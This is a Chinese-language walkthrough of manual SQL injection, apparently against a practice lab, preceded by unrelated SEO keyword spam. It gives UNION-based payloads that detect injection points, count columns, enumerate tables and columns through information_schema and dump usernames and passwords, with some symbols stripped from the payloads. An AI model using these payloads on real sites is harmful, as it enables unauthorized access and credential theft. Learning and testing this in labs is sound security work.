wordpress中英文网站,电商公司运营策略,施工企业会计科目,网站做推广有用目录
1.判断是否存在sql注入点
1.1我们在地址栏中输入?id1
1.2我们在地址栏中输入?id--
2.联合查询
2.1首先知道表格有几列#xff0c;如果报错就是超过列数#xff0c;如果显示正常就是没有超出列数。
2.2爆出显示位#xff0c;就是看看表格里面哪一列是在页面显示…目录
1.判断是否存在sql注入点
1.1我们在地址栏中输入?id1
1.2我们在地址栏中输入?id--
2.联合查询
2.1首先知道表格有几列如果报错就是超过列数如果显示正常就是没有超出列数。
2.2爆出显示位就是看看表格里面哪一列是在页面显示的
2.3获取当前数据名和版本号
2.4爆表
2.5爆字段名
2.6爆账号密码 1.判断是否存在sql注入点 1.1我们在地址栏中输入?id1 1.2我们在地址栏中输入?id-- 根据结果可判断出是字符型注入该页面存在回显所以我们可以使用联合查询 1.?id1 and 11 和?id1 and 12进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为数字型注入。 2.?id1 and 11--和?id1 and 12--进行测试如果11页面显示正常和原页面一样并且12页面报错或者页面部分数据显示不正常那么可以确定此处为字符型注入。 2.联合查询
注意联合查询两表之间列数必须相同
2.1首先知道表格有几列如果报错就是超过列数如果显示正常就是没有超出列数。
?id1order by 4 -- ?id1order by 3 -- 根据结果可判断出此表有3列
2.2爆出显示位就是看看表格里面哪一列是在页面显示的
?id-1union select 1,2,3--
注意union查询时如果左右两边都为真则返回前者查询的结果所以要让后面我们自己构造的查询语句回显的话前面id必须填写一个查询不到的数这里我填的是-1 可以看到查询结果是在2和3的位置回显的则可以将2和3替换为我们的查询语句。
2.3获取当前数据名和版本号
?id-1union select 1,database(),version()-- 通过结果知道当前表所处的数据库是security,版本是5.7.26
2.4爆表 mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库他保存着mysql 服务器所维护的所有其他的数据库信息 包括了 库名表名列名。 在注入时information_schema库的作用就是获取 table_schema table_name, column_name .
这些数据库内的信息。如果information_schema库被过滤掉还可以尝试使用下述库来代替 sys.schema_auto_increment_columns sys.schema_table_statistics_with_buffer mysql.innodb_table_stats mysql.innodb_table_index ?id-1union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity-- 根据结果可知当前security库下有四张表并且users表最有可能存放用户信息
2.5爆字段名
我们通过sql语句查询知道当前数据库有四个表根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。
?id-1union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers--
此语句是查询information_schema数据库下的columns表里users的列名
注意table_name字段不是只存在于tables表也是存在columns表中。表示所有字段对应的表名。 通过上述操作可以得到两个敏感字段就是username和password最有可能存放用户的账号密码
2.6爆账号密码
?id-1 union select 1,2,group_concat(username ,id , password) from users-- 这样我们就爆出各个用户的账号密码了本次手工注入到此结束。